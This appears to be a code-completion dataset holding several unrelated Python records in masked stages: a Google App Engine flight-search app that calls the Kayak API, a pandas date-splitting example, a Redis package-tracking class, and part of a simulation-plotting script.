"step-2": "<mask token>\n\n\nclass KayakApi(webapp.RequestHandler):\n\n def get(self):\n messaging = Messaging()\n messaging.collect_messages()\n messaging.process_messages()\n kayak_session = kayak.get_session()\n logging.debug(kayak_session.content)\n session_id = re.search('<sid>(.*?)</sid>', kayak_session.content)\n session_id = session_id.group(1)\n kayak.session_id = session_id\n kayak.headers = {'Cookie': kayak_session.headers['set-cookie']}\n kayak_search = kayak.post_search(messaging.mentions['from'],\n messaging.mentions['to'], messaging.mentions['departure']['day'\n ] + '/' + messaging.mentions['departure']['month'] + '/' +\n messaging.mentions['departure']['year'], messaging.mentions[\n 'retour']['day'] + '/' + messaging.mentions['retour']['month'] +\n '/' + messaging.mentions['retour']['year'])\n logging.debug(kayak_search.content)\n search_id = re.search('<searchid>(.*?)</searchid>', kayak_search.\n content)\n search_id = search_id.group(1)\n kayak.search_id = search_id\n kayak_results = kayak.get_results()\n logging.debug(kayak_results.content)\n result_set = ''\n more_pending = re.search('<morepending>true</morepending>',\n kayak_results.content)\n if more_pending.group(0) is not None:\n more_pending = True\n if more_pending:\n time.sleep(10)\n kayak_results = kayak.get_results()\n result_set = kayak_results.content\n logging.debug(kayak_results.content)\n content = replace(result_set, '&', '&')\n xml = XML2Dict()\n trips = xml.fromstring(content)\n trip_dict = {'trips': trips}\n path = os.path.join(os.path.dirname(__file__), 'templates/kayak.html')\n self.response.out.write(template.render(path, trip_dict))\n\n\nclass KayakHandler(webapp.RequestHandler):\n\n def get(self):\n file = open('kayak-result.xml', 'r')\n content = file.read()\n content = replace(content, '&', '&')\n xml = XML2Dict()\n trips = xml.fromstring(content)\n trip_dict = {'trips': trips}\n \"\"\"\n xml = ET.fromstring(content)\n trips = xml.findall(\"trips/trip\")\n trip_dict = 
{'trips' : trips}\n \"\"\"\n path = os.path.join(os.path.dirname(__file__), 'templates/kayak.html')\n self.response.out.write(template.render(path, trip_dict))\n\n\nclass ClearTripHandler(webapp.RequestHandler):\n\n def get(self):\n file = open('result.xml', 'r')\n content = file.read()\n content = replace(content, '&', '&')\n xml = XML2Dict()\n trips = xml.fromstring(content)\n trip_dict = {'trips': trips}\n \"\"\"\n xml = ET.fromstring(content)\n trips = xml.findall(\"trips/trip\")\n trip_dict = {'trips' : trips}\n \"\"\"\n path = os.path.join(os.path.dirname(__file__),\n 'templates/cleartrip.html')\n self.response.out.write(template.render(path, trip_dict))\n\n\nclass MessageParser(webapp.RequestHandler):\n\n def get(self):\n messaging = Messaging()\n messaging.collect_messages()\n messaging.process_messages()\n self.response.out.write(messaging.mentions)\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass CronHandler(webapp.RequestHandler):\n <mask token>\n\n\nclass KayakApi(webapp.RequestHandler):\n\n def get(self):\n messaging = Messaging()\n messaging.collect_messages()\n messaging.process_messages()\n kayak_session = kayak.get_session()\n logging.debug(kayak_session.content)\n session_id = re.search('<sid>(.*?)</sid>', kayak_session.content)\n session_id = session_id.group(1)\n kayak.session_id = session_id\n kayak.headers = {'Cookie': kayak_session.headers['set-cookie']}\n kayak_search = kayak.post_search(messaging.mentions['from'],\n messaging.mentions['to'], messaging.mentions['departure']['day'\n ] + '/' + messaging.mentions['departure']['month'] + '/' +\n messaging.mentions['departure']['year'], messaging.mentions[\n 'retour']['day'] + '/' + messaging.mentions['retour']['month'] +\n '/' + messaging.mentions['retour']['year'])\n logging.debug(kayak_search.content)\n search_id = re.search('<searchid>(.*?)</searchid>', kayak_search.\n content)\n search_id = search_id.group(1)\n kayak.search_id = search_id\n kayak_results = kayak.get_results()\n logging.debug(kayak_results.content)\n result_set = ''\n more_pending = re.search('<morepending>true</morepending>',\n kayak_results.content)\n if more_pending.group(0) is not None:\n more_pending = True\n if more_pending:\n time.sleep(10)\n kayak_results = kayak.get_results()\n result_set = kayak_results.content\n logging.debug(kayak_results.content)\n content = replace(result_set, '&', '&')\n xml = XML2Dict()\n trips = xml.fromstring(content)\n trip_dict = {'trips': trips}\n path = os.path.join(os.path.dirname(__file__), 'templates/kayak.html')\n self.response.out.write(template.render(path, trip_dict))\n\n\nclass KayakHandler(webapp.RequestHandler):\n\n def get(self):\n file = open('kayak-result.xml', 'r')\n content = file.read()\n content = replace(content, '&', '&')\n xml = XML2Dict()\n trips = xml.fromstring(content)\n trip_dict = {'trips': trips}\n \"\"\"\n xml = 
ET.fromstring(content)\n trips = xml.findall(\"trips/trip\")\n trip_dict = {'trips' : trips}\n \"\"\"\n path = os.path.join(os.path.dirname(__file__), 'templates/kayak.html')\n self.response.out.write(template.render(path, trip_dict))\n\n\nclass ClearTripHandler(webapp.RequestHandler):\n\n def get(self):\n file = open('result.xml', 'r')\n content = file.read()\n content = replace(content, '&', '&')\n xml = XML2Dict()\n trips = xml.fromstring(content)\n trip_dict = {'trips': trips}\n \"\"\"\n xml = ET.fromstring(content)\n trips = xml.findall(\"trips/trip\")\n trip_dict = {'trips' : trips}\n \"\"\"\n path = os.path.join(os.path.dirname(__file__),\n 'templates/cleartrip.html')\n self.response.out.write(template.render(path, trip_dict))\n\n\nclass MessageParser(webapp.RequestHandler):\n\n def get(self):\n messaging = Messaging()\n messaging.collect_messages()\n messaging.process_messages()\n self.response.out.write(messaging.mentions)\n\n\n<mask token>\n",
"step-4": "<mask token>\n\n\nclass MainHandler(webapp.RequestHandler):\n <mask token>\n\n\nclass CronHandler(webapp.RequestHandler):\n\n def get(self):\n cron = Cron()\n cron.init_scheduler()\n cron.run()\n\n\nclass KayakApi(webapp.RequestHandler):\n\n def get(self):\n messaging = Messaging()\n messaging.collect_messages()\n messaging.process_messages()\n kayak_session = kayak.get_session()\n logging.debug(kayak_session.content)\n session_id = re.search('<sid>(.*?)</sid>', kayak_session.content)\n session_id = session_id.group(1)\n kayak.session_id = session_id\n kayak.headers = {'Cookie': kayak_session.headers['set-cookie']}\n kayak_search = kayak.post_search(messaging.mentions['from'],\n messaging.mentions['to'], messaging.mentions['departure']['day'\n ] + '/' + messaging.mentions['departure']['month'] + '/' +\n messaging.mentions['departure']['year'], messaging.mentions[\n 'retour']['day'] + '/' + messaging.mentions['retour']['month'] +\n '/' + messaging.mentions['retour']['year'])\n logging.debug(kayak_search.content)\n search_id = re.search('<searchid>(.*?)</searchid>', kayak_search.\n content)\n search_id = search_id.group(1)\n kayak.search_id = search_id\n kayak_results = kayak.get_results()\n logging.debug(kayak_results.content)\n result_set = ''\n more_pending = re.search('<morepending>true</morepending>',\n kayak_results.content)\n if more_pending.group(0) is not None:\n more_pending = True\n if more_pending:\n time.sleep(10)\n kayak_results = kayak.get_results()\n result_set = kayak_results.content\n logging.debug(kayak_results.content)\n content = replace(result_set, '&', '&')\n xml = XML2Dict()\n trips = xml.fromstring(content)\n trip_dict = {'trips': trips}\n path = os.path.join(os.path.dirname(__file__), 'templates/kayak.html')\n self.response.out.write(template.render(path, trip_dict))\n\n\nclass KayakHandler(webapp.RequestHandler):\n\n def get(self):\n file = open('kayak-result.xml', 'r')\n content = file.read()\n content = replace(content, '&', 
'&')\n xml = XML2Dict()\n trips = xml.fromstring(content)\n trip_dict = {'trips': trips}\n \"\"\"\n xml = ET.fromstring(content)\n trips = xml.findall(\"trips/trip\")\n trip_dict = {'trips' : trips}\n \"\"\"\n path = os.path.join(os.path.dirname(__file__), 'templates/kayak.html')\n self.response.out.write(template.render(path, trip_dict))\n\n\nclass ClearTripHandler(webapp.RequestHandler):\n\n def get(self):\n file = open('result.xml', 'r')\n content = file.read()\n content = replace(content, '&', '&')\n xml = XML2Dict()\n trips = xml.fromstring(content)\n trip_dict = {'trips': trips}\n \"\"\"\n xml = ET.fromstring(content)\n trips = xml.findall(\"trips/trip\")\n trip_dict = {'trips' : trips}\n \"\"\"\n path = os.path.join(os.path.dirname(__file__),\n 'templates/cleartrip.html')\n self.response.out.write(template.render(path, trip_dict))\n\n\nclass MessageParser(webapp.RequestHandler):\n\n def get(self):\n messaging = Messaging()\n messaging.collect_messages()\n messaging.process_messages()\n self.response.out.write(messaging.mentions)\n\n\n<mask token>\n",
"step-5": "import os\nimport re\nimport logging\nimport time\nfrom string import replace\nfrom settings import *\nimport wsgiref.handlers\nfrom google.appengine.ext import webapp\nfrom google.appengine.ext.webapp import template\n\nfrom modules.xml2dict import *\nfrom modules import kayak\nfrom modules.messaging import *\nfrom modules.cron import *\n\nkayak = kayak.Kayak(\n SETTINGS['Kayak']['API_TOKEN'],\n SETTINGS['Kayak']['BASE_URL'],\n)\n\nclass MainHandler(webapp.RequestHandler):\n def get(self):\n pass\n '''\n messages = twitter.statuses.mentions()\n mydict = {'messages':{}}\n counter = 0\n for message in messages:\n mydict['messages'][('%s' % counter)] = message\n counter += 1\n \n path = os.path.join(os.path.dirname(__file__), 'templates/index.html')\n self.response.out.write(template.render(path, mydict))\n '''\n\nclass CronHandler(webapp.RequestHandler):\n def get(self):\n \n cron = Cron()\n cron.init_scheduler()\n cron.run()\n \n\nclass KayakApi(webapp.RequestHandler):\n\n def get(self):\n \n messaging = Messaging()\n messaging.collect_messages()\n messaging.process_messages()\n \n kayak_session = kayak.get_session()\n logging.debug(kayak_session.content)\n \n session_id = re.search('<sid>(.*?)</sid>', kayak_session.content)\n session_id = session_id.group(1)\n \n kayak.session_id = session_id\n kayak.headers = { 'Cookie' : kayak_session.headers['set-cookie'] }\n \n kayak_search = kayak.post_search(\n messaging.mentions['from'],\n messaging.mentions['to'],\n messaging.mentions['departure']['day'] + '/' + messaging.mentions['departure']['month'] + '/' + messaging.mentions['departure']['year'],\n messaging.mentions['retour']['day'] + '/' + messaging.mentions['retour']['month'] + '/' + messaging.mentions['retour']['year']\n )\n logging.debug(kayak_search.content)\n \n search_id = re.search('<searchid>(.*?)</searchid>', kayak_search.content)\n search_id = search_id.group(1)\n \n kayak.search_id = search_id\n kayak_results = kayak.get_results()\n 
logging.debug(kayak_results.content)\n\n result_set = ''\n\n more_pending = re.search('<morepending>true</morepending>', kayak_results.content)\n \n if more_pending.group(0) is not None:\n more_pending = True\n \n if more_pending:\n time.sleep(10)\n kayak_results = kayak.get_results()\n result_set = kayak_results.content\n logging.debug(kayak_results.content)\n \n content = replace(result_set, '&', '&')\n xml = XML2Dict()\n trips = xml.fromstring(content)\n trip_dict = {'trips' : trips}\n path = os.path.join(os.path.dirname(__file__), 'templates/kayak.html')\n self.response.out.write(template.render(path, trip_dict))\n\nclass KayakHandler(webapp.RequestHandler):\n \n def get(self):\n file = open('kayak-result.xml','r')\n content = file.read()\n content = replace(content, '&', '&')\n xml = XML2Dict()\n trips = xml.fromstring(content)\n trip_dict = {'trips' : trips}\n '''\n xml = ET.fromstring(content)\n trips = xml.findall(\"trips/trip\")\n trip_dict = {'trips' : trips}\n '''\n path = os.path.join(os.path.dirname(__file__), 'templates/kayak.html')\n self.response.out.write(template.render(path, trip_dict))\n \nclass ClearTripHandler(webapp.RequestHandler):\n \n def get(self):\n file = open('result.xml','r')\n content = file.read()\n content = replace(content, '&', '&')\n xml = XML2Dict()\n trips = xml.fromstring(content)\n trip_dict = {'trips' : trips}\n '''\n xml = ET.fromstring(content)\n trips = xml.findall(\"trips/trip\")\n trip_dict = {'trips' : trips}\n '''\n path = os.path.join(os.path.dirname(__file__), 'templates/cleartrip.html')\n self.response.out.write(template.render(path, trip_dict))\n\nclass MessageParser(webapp.RequestHandler):\n\n def get(self):\n \n messaging = Messaging()\n messaging.collect_messages()\n messaging.process_messages()\n \n self.response.out.write(messaging.mentions)\n \n \n\ndef main():\n logging.getLogger().setLevel(logging.DEBUG)\n application = webapp.WSGIApplication([\n ('/', MainHandler),\n ('/kayak', KayakHandler),\n 
('/cleartrip', ClearTripHandler),\n ('/cron', CronHandler),\n ('/api/kayak', KayakApi),\n ('/messaging', MessageParser),\n ], debug=True)\n wsgiref.handlers.CGIHandler().run(application)\n\nif __name__ == '__main__':\n main()\n\n\n",
"step-ids": [
5,
8,
9,
11,
17
]
}
|
[
5,
8,
9,
11,
17
] |
#%%
### Splitting date data
# Extract individual components from year-month-day date strings.
import pandas as pd
df = pd.read_csv('../../datasets/part5/stock-data.csv')
# Convert the string date column into pandas Timestamps
df['new_Date'] = pd.to_datetime(df['Date'])  # added to df as a new column
print(df.head())
print()
# Use the .dt accessor to split new_Date into year, month, and day columns
df['Year'] = df['new_Date'].dt.year
df['Month'] = df['new_Date'].dt.month
df['Day'] = df['new_Date'].dt.day
print(df.head())
print('------------------')
# Convert Timestamp to Period to change the year-month-day representation:
# to_period() keeps only the year ('A' = annual) or the year-month ('M').
df['Date_yr'] = df['new_Date'].dt.to_period(freq='A')  # year only
df['Date_m'] = df['new_Date'].dt.to_period(freq='M')  # year-month
print(df.head())
print('------------------')
# Use the year-month column as the row index
df.set_index('Date_m', inplace=True)
print(df.head())
# %%
|
normal
|
{
"blob_id": "d89e1d653c6db322feb6edba93cbfc622bf47aa2",
"index": 2781,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nprint(df.head())\nprint()\n<mask token>\nprint(df.head())\nprint('------------------')\n<mask token>\nprint(df.head())\nprint('------------------')\ndf.set_index('Date_m', inplace=True)\nprint(df.head())\n",
"step-3": "<mask token>\ndf = pd.read_csv('../../datasets/part5/stock-data.csv')\ndf['new_Date'] = pd.to_datetime(df['Date'])\nprint(df.head())\nprint()\ndf['Year'] = df['new_Date'].dt.year\ndf['Month'] = df['new_Date'].dt.month\ndf['Day'] = df['new_Date'].dt.day\nprint(df.head())\nprint('------------------')\ndf['Date_yr'] = df['new_Date'].dt.to_period(freq='A')\ndf['Date_m'] = df['new_Date'].dt.to_period(freq='M')\nprint(df.head())\nprint('------------------')\ndf.set_index('Date_m', inplace=True)\nprint(df.head())\n",
"step-4": "import pandas as pd\ndf = pd.read_csv('../../datasets/part5/stock-data.csv')\ndf['new_Date'] = pd.to_datetime(df['Date'])\nprint(df.head())\nprint()\ndf['Year'] = df['new_Date'].dt.year\ndf['Month'] = df['new_Date'].dt.month\ndf['Day'] = df['new_Date'].dt.day\nprint(df.head())\nprint('------------------')\ndf['Date_yr'] = df['new_Date'].dt.to_period(freq='A')\ndf['Date_m'] = df['new_Date'].dt.to_period(freq='M')\nprint(df.head())\nprint('------------------')\ndf.set_index('Date_m', inplace=True)\nprint(df.head())\n",
"step-5": "#%%\n\n### 날짜 데이터 분리\n# 연-월-일 날짜 데이터에서 일부 분리 추출\n\nimport pandas as pd\n\ndf = pd.read_csv('../../datasets/part5/stock-data.csv')\n\n# 문자열인 날짜 데이터를 판다스 Timestamp로 변환\ndf['new_Date'] = pd.to_datetime(df['Date']) # df에 새로운 열로 추가\nprint(df.head())\nprint()\n\n# dt 속성을 이용하여 new_Data 열의 연-월-일 정보를 년, 월, 일로 구분\ndf['Year'] = df['new_Date'].dt.year\ndf['Month'] = df['new_Date'].dt.month\ndf['Day'] = df['new_Date'].dt.day\nprint(df.head())\nprint('------------------')\n\n# Timestamp를 Period로 변환하여 연-월-일 표기 변경하기\n# to_period() 메소드를 적용하여, 연-월-일 중 연-월 또는 연도를 추출 \ndf['Date_yr'] = df['new_Date'].dt.to_period(freq='A') # 연도를 나타내는 값 저장\ndf['Date_m'] = df['new_Date'].dt.to_period(freq='M') # 연-월을 나타내는 값 저장\nprint(df.head())\nprint('------------------')\n\n# 원하는 열을 행 인덱스로 지정\ndf.set_index('Date_m', inplace=True)\nprint(df.head())\n# %%\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
class Carteiro:
if os.environ.get('REDIS_URL') != None:
redis_pool = redis.ConnectionPool.from_url(os.environ.get('REDIS_URL'))
else:
redis_pool = ''
def __init__(self, id, pacote):
if os.environ.get('REDIS_URL') != None:
self.redis_bd = redis.Redis(connection_pool=Carteiro.redis_pool)
else:
self.redis_bd = redis.Redis()
self.user_id = str(id)
self.pacote = bytes(str(pacote), 'ascii')
self.user_dict = self.redis_bd.hgetall(self.user_id)
<|reserved_special_token_0|>
<|reserved_special_token_0|>
def roubar_pacote(self):
if self.pacote in self.user_dict:
if len(self.user_dict) == 1:
self.redis_bd.delete(self.user_id)
else:
self.redis_bd.hdel(self.user_id, self.pacote)
del self.user_dict[self.pacote]
else:
raise ValueError('codigo nao existente na base de dados')
def checar_existencia_pacote(self):
return self.user_dict.get(self.pacote)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Carteiro:
if os.environ.get('REDIS_URL') != None:
redis_pool = redis.ConnectionPool.from_url(os.environ.get('REDIS_URL'))
else:
redis_pool = ''
def __init__(self, id, pacote):
if os.environ.get('REDIS_URL') != None:
self.redis_bd = redis.Redis(connection_pool=Carteiro.redis_pool)
else:
self.redis_bd = redis.Redis()
self.user_id = str(id)
self.pacote = bytes(str(pacote), 'ascii')
self.user_dict = self.redis_bd.hgetall(self.user_id)
def guardar_status_encomenda(self, status):
if self.redis_bd.exists(self.user_id):
self.user_dict[self.pacote] = status
self.redis_bd.hmset(self.user_id, self.user_dict)
else:
novo_user_dict = {self.pacote: status}
self.redis_bd.hmset(self.user_id, novo_user_dict)
<|reserved_special_token_0|>
def roubar_pacote(self):
if self.pacote in self.user_dict:
if len(self.user_dict) == 1:
self.redis_bd.delete(self.user_id)
else:
self.redis_bd.hdel(self.user_id, self.pacote)
del self.user_dict[self.pacote]
else:
raise ValueError('codigo nao existente na base de dados')
def checar_existencia_pacote(self):
return self.user_dict.get(self.pacote)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Carteiro:
if os.environ.get('REDIS_URL') != None:
redis_pool = redis.ConnectionPool.from_url(os.environ.get('REDIS_URL'))
else:
redis_pool = ''
def __init__(self, id, pacote):
if os.environ.get('REDIS_URL') != None:
self.redis_bd = redis.Redis(connection_pool=Carteiro.redis_pool)
else:
self.redis_bd = redis.Redis()
self.user_id = str(id)
self.pacote = bytes(str(pacote), 'ascii')
self.user_dict = self.redis_bd.hgetall(self.user_id)
def guardar_status_encomenda(self, status):
if self.redis_bd.exists(self.user_id):
self.user_dict[self.pacote] = status
self.redis_bd.hmset(self.user_id, self.user_dict)
else:
novo_user_dict = {self.pacote: status}
self.redis_bd.hmset(self.user_id, novo_user_dict)
def ler_carta(self):
carta = self.user_dict.get(self.pacote)
carta = carta.decode(encoding='UTF-8')
return carta
def roubar_pacote(self):
if self.pacote in self.user_dict:
if len(self.user_dict) == 1:
self.redis_bd.delete(self.user_id)
else:
self.redis_bd.hdel(self.user_id, self.pacote)
del self.user_dict[self.pacote]
else:
raise ValueError('codigo nao existente na base de dados')
def checar_existencia_pacote(self):
return self.user_dict.get(self.pacote)
<|reserved_special_token_1|>
import os
import redis
class Carteiro:
if os.environ.get('REDIS_URL') != None:
redis_pool = redis.ConnectionPool.from_url(os.environ.get('REDIS_URL'))
else:
redis_pool = ''
def __init__(self, id, pacote):
if os.environ.get('REDIS_URL') != None:
self.redis_bd = redis.Redis(connection_pool=Carteiro.redis_pool)
else:
self.redis_bd = redis.Redis()
self.user_id = str(id)
self.pacote = bytes(str(pacote), 'ascii')
self.user_dict = self.redis_bd.hgetall(self.user_id)
def guardar_status_encomenda(self, status):
if self.redis_bd.exists(self.user_id):
self.user_dict[self.pacote] = status
self.redis_bd.hmset(self.user_id, self.user_dict)
else:
novo_user_dict = {self.pacote: status}
self.redis_bd.hmset(self.user_id, novo_user_dict)
def ler_carta(self):
carta = self.user_dict.get(self.pacote)
carta = carta.decode(encoding='UTF-8')
return carta
def roubar_pacote(self):
if self.pacote in self.user_dict:
if len(self.user_dict) == 1:
self.redis_bd.delete(self.user_id)
else:
self.redis_bd.hdel(self.user_id, self.pacote)
del self.user_dict[self.pacote]
else:
raise ValueError('codigo nao existente na base de dados')
def checar_existencia_pacote(self):
return self.user_dict.get(self.pacote)
<|reserved_special_token_1|>
import os
import redis
class Carteiro:
    """Stores and retrieves package ("pacote") tracking statuses in Redis.

    Each user id maps to a Redis hash whose fields are package codes
    (bytes) and whose values are the last known status payloads.
    """

    # Share one connection pool per process when REDIS_URL is configured
    # (hosted Redis, e.g. Heroku); otherwise fall back to a plain local
    # redis.Redis() connection.
    if os.environ.get("REDIS_URL") is not None:
        redis_pool = redis.ConnectionPool.from_url(os.environ.get("REDIS_URL"))
    else:
        redis_pool = ''

    def __init__(self, id, pacote):
        # FIX: branch on the pool built at class level instead of re-reading
        # the environment, so the two checks can never disagree.
        if Carteiro.redis_pool:
            self.redis_bd = redis.Redis(connection_pool=Carteiro.redis_pool)
        else:
            self.redis_bd = redis.Redis()
        self.user_id = str(id)
        # Redis returns hash fields as bytes, so keep the package code as
        # bytes for lookups against hgetall()'s result.
        self.pacote = bytes(str(pacote), 'ascii')
        # Local snapshot of the user's hash: {package_code: status}.
        self.user_dict = self.redis_bd.hgetall(self.user_id)

    def guardar_status_encomenda(self, status):
        """Save *status* for this package, creating the hash if needed.

        HMSET creates the hash when it is absent, so one single-field write
        covers both the new-user and existing-user cases. FIX: the old code
        rewrote the user's entire hash on the existing-user path and never
        updated the local user_dict cache on the new-user path (so a
        subsequent ler_carta()/checar_existencia_pacote() saw stale data).
        """
        # NOTE(review): hmset is deprecated/removed in redis-py >= 4.0;
        # migrate to hset(..., mapping=...) when the client is upgraded.
        self.user_dict[self.pacote] = status
        self.redis_bd.hmset(self.user_id, {self.pacote: status})

    def ler_carta(self):
        """Return the stored status for this package, decoded as UTF-8.

        Raises AttributeError if the package is not tracked (get() returns
        None), matching the original behavior.
        """
        carta = self.user_dict.get(self.pacote)
        carta = carta.decode(encoding='UTF-8')
        return carta

    def roubar_pacote(self):
        """Remove this package from the user's hash.

        Deletes the whole Redis key when this is the user's last package;
        raises ValueError when the package is not tracked for this user.
        """
        if self.pacote in self.user_dict:
            if len(self.user_dict) == 1:
                self.redis_bd.delete(self.user_id)
            else:
                self.redis_bd.hdel(self.user_id, self.pacote)
            del self.user_dict[self.pacote]
        else:
            raise ValueError('codigo nao existente na base de dados')

    def checar_existencia_pacote(self):
        """Return the cached status for this package, or None if absent."""
        return self.user_dict.get(self.pacote)
|
flexible
|
{
"blob_id": "dd95d14f35b6a92b3363d99a616678da18733a61",
"index": 7839,
"step-1": "<mask token>\n\n\nclass Carteiro:\n if os.environ.get('REDIS_URL') != None:\n redis_pool = redis.ConnectionPool.from_url(os.environ.get('REDIS_URL'))\n else:\n redis_pool = ''\n\n def __init__(self, id, pacote):\n if os.environ.get('REDIS_URL') != None:\n self.redis_bd = redis.Redis(connection_pool=Carteiro.redis_pool)\n else:\n self.redis_bd = redis.Redis()\n self.user_id = str(id)\n self.pacote = bytes(str(pacote), 'ascii')\n self.user_dict = self.redis_bd.hgetall(self.user_id)\n <mask token>\n <mask token>\n\n def roubar_pacote(self):\n if self.pacote in self.user_dict:\n if len(self.user_dict) == 1:\n self.redis_bd.delete(self.user_id)\n else:\n self.redis_bd.hdel(self.user_id, self.pacote)\n del self.user_dict[self.pacote]\n else:\n raise ValueError('codigo nao existente na base de dados')\n\n def checar_existencia_pacote(self):\n return self.user_dict.get(self.pacote)\n",
"step-2": "<mask token>\n\n\nclass Carteiro:\n if os.environ.get('REDIS_URL') != None:\n redis_pool = redis.ConnectionPool.from_url(os.environ.get('REDIS_URL'))\n else:\n redis_pool = ''\n\n def __init__(self, id, pacote):\n if os.environ.get('REDIS_URL') != None:\n self.redis_bd = redis.Redis(connection_pool=Carteiro.redis_pool)\n else:\n self.redis_bd = redis.Redis()\n self.user_id = str(id)\n self.pacote = bytes(str(pacote), 'ascii')\n self.user_dict = self.redis_bd.hgetall(self.user_id)\n\n def guardar_status_encomenda(self, status):\n if self.redis_bd.exists(self.user_id):\n self.user_dict[self.pacote] = status\n self.redis_bd.hmset(self.user_id, self.user_dict)\n else:\n novo_user_dict = {self.pacote: status}\n self.redis_bd.hmset(self.user_id, novo_user_dict)\n <mask token>\n\n def roubar_pacote(self):\n if self.pacote in self.user_dict:\n if len(self.user_dict) == 1:\n self.redis_bd.delete(self.user_id)\n else:\n self.redis_bd.hdel(self.user_id, self.pacote)\n del self.user_dict[self.pacote]\n else:\n raise ValueError('codigo nao existente na base de dados')\n\n def checar_existencia_pacote(self):\n return self.user_dict.get(self.pacote)\n",
"step-3": "<mask token>\n\n\nclass Carteiro:\n if os.environ.get('REDIS_URL') != None:\n redis_pool = redis.ConnectionPool.from_url(os.environ.get('REDIS_URL'))\n else:\n redis_pool = ''\n\n def __init__(self, id, pacote):\n if os.environ.get('REDIS_URL') != None:\n self.redis_bd = redis.Redis(connection_pool=Carteiro.redis_pool)\n else:\n self.redis_bd = redis.Redis()\n self.user_id = str(id)\n self.pacote = bytes(str(pacote), 'ascii')\n self.user_dict = self.redis_bd.hgetall(self.user_id)\n\n def guardar_status_encomenda(self, status):\n if self.redis_bd.exists(self.user_id):\n self.user_dict[self.pacote] = status\n self.redis_bd.hmset(self.user_id, self.user_dict)\n else:\n novo_user_dict = {self.pacote: status}\n self.redis_bd.hmset(self.user_id, novo_user_dict)\n\n def ler_carta(self):\n carta = self.user_dict.get(self.pacote)\n carta = carta.decode(encoding='UTF-8')\n return carta\n\n def roubar_pacote(self):\n if self.pacote in self.user_dict:\n if len(self.user_dict) == 1:\n self.redis_bd.delete(self.user_id)\n else:\n self.redis_bd.hdel(self.user_id, self.pacote)\n del self.user_dict[self.pacote]\n else:\n raise ValueError('codigo nao existente na base de dados')\n\n def checar_existencia_pacote(self):\n return self.user_dict.get(self.pacote)\n",
"step-4": "import os\nimport redis\n\n\nclass Carteiro:\n if os.environ.get('REDIS_URL') != None:\n redis_pool = redis.ConnectionPool.from_url(os.environ.get('REDIS_URL'))\n else:\n redis_pool = ''\n\n def __init__(self, id, pacote):\n if os.environ.get('REDIS_URL') != None:\n self.redis_bd = redis.Redis(connection_pool=Carteiro.redis_pool)\n else:\n self.redis_bd = redis.Redis()\n self.user_id = str(id)\n self.pacote = bytes(str(pacote), 'ascii')\n self.user_dict = self.redis_bd.hgetall(self.user_id)\n\n def guardar_status_encomenda(self, status):\n if self.redis_bd.exists(self.user_id):\n self.user_dict[self.pacote] = status\n self.redis_bd.hmset(self.user_id, self.user_dict)\n else:\n novo_user_dict = {self.pacote: status}\n self.redis_bd.hmset(self.user_id, novo_user_dict)\n\n def ler_carta(self):\n carta = self.user_dict.get(self.pacote)\n carta = carta.decode(encoding='UTF-8')\n return carta\n\n def roubar_pacote(self):\n if self.pacote in self.user_dict:\n if len(self.user_dict) == 1:\n self.redis_bd.delete(self.user_id)\n else:\n self.redis_bd.hdel(self.user_id, self.pacote)\n del self.user_dict[self.pacote]\n else:\n raise ValueError('codigo nao existente na base de dados')\n\n def checar_existencia_pacote(self):\n return self.user_dict.get(self.pacote)\n",
"step-5": "import os\nimport redis\n\nclass Carteiro():\n\n if os.environ.get(\"REDIS_URL\") != None:\n redis_pool = redis.ConnectionPool.from_url(os.environ.get(\"REDIS_URL\"))\n else:\n redis_pool = ''\n \n def __init__(self, id, pacote):\n if os.environ.get(\"REDIS_URL\") != None:\n self.redis_bd = redis.Redis(connection_pool=Carteiro.redis_pool)\n else:\n self.redis_bd = redis.Redis()\n\n self.user_id = str(id)\n self.pacote = bytes(str(pacote), 'ascii')\n self.user_dict = self.redis_bd.hgetall(self.user_id)\n\n def guardar_status_encomenda(self, status):\n \n if self.redis_bd.exists(self.user_id):\n self.user_dict[self.pacote] = status\n self.redis_bd.hmset(self.user_id, self.user_dict)\n else:\n novo_user_dict = {self.pacote: status}\n self.redis_bd.hmset(self.user_id, novo_user_dict)\n \n def ler_carta(self):\n carta = self.user_dict.get(self.pacote)\n carta = carta.decode(encoding='UTF-8')\n return carta\n\n def roubar_pacote(self):\n if self.pacote in self.user_dict:\n if len(self.user_dict) == 1:\n self.redis_bd.delete(self.user_id)\n else:\n self.redis_bd.hdel(self.user_id, self.pacote)\n del self.user_dict[self.pacote]\n else:\n raise ValueError('codigo nao existente na base de dados')\n\n def checar_existencia_pacote(self):\n return self.user_dict.get(self.pacote)",
"step-ids": [
4,
5,
6,
7,
8
]
}
|
[
4,
5,
6,
7,
8
] |
<|reserved_special_token_0|>
def main():
n_joints = 10
parameter_set = [SimulationParameters(simulation_duration=15, drive=4.0,
amplitudes=None, phase_lag=None, turn=None, amplitude_gradient=[
Rhead, Rtail], backward=None, frequency=1) for Rhead in np.linspace
(0.2, 0.5, 10) for Rtail in np.linspace(0.5, 0.2, 10)]
plot_9c(parameter_set)
def plot_9c(parameter_set):
results_vel = np.zeros([len(parameter_set), 3])
results_en = np.zeros([len(parameter_set), 3])
ratio_vel_en = np.zeros([len(parameter_set), 3])
sal_pos_t = []
sal_pos_t_bad = []
t = time.time()
path = (
'D:/EPFL/MA2/Computational Motor Control/Local/Lab9/Webots/controllers/pythonController/'
)
print(path)
for i in range(len(parameter_set)):
with np.load(path + '/logs/9c/simulation_' + str(i) + '.npz',
allow_pickle=True) as data:
position = data['links'][:, 0, :]
n_steps = len(position)
timestep = float(data['timestep'])
results_vel[i][0] = data['amplitude_gradient'][0]
results_vel[i][1] = data['amplitude_gradient'][1]
results_en[i][:2] = results_vel[i][:2]
ratio_vel_en[i][:2] = results_vel[i][:2]
begin_step = int(4 / timestep)
vel = (position[n_steps - 1, :] - position[begin_step, :]) ** 2
results_vel[i][2] = np.sqrt(np.sum(vel)) / ((n_steps -
begin_step) * timestep)
joint_vel = data['joints'][begin_step:, :, 1]
joint_tor = data['joints'][begin_step:, :, 3]
energy = joint_vel * joint_tor
results_en[i][2] = np.log10(np.mean(np.sum(energy, 1)))
ratio_vel_en[i][2] = results_vel[i][2] / results_en[i][2]
print('Time elapsed for the velocity plot' + str(time.time() - t))
plt.figure('Velocity')
plot_2d(results_vel, ['Amplitude Head [rad]', 'Amplitude Tail [rad]',
'Velocity [m/s]'])
plt.figure('Energy')
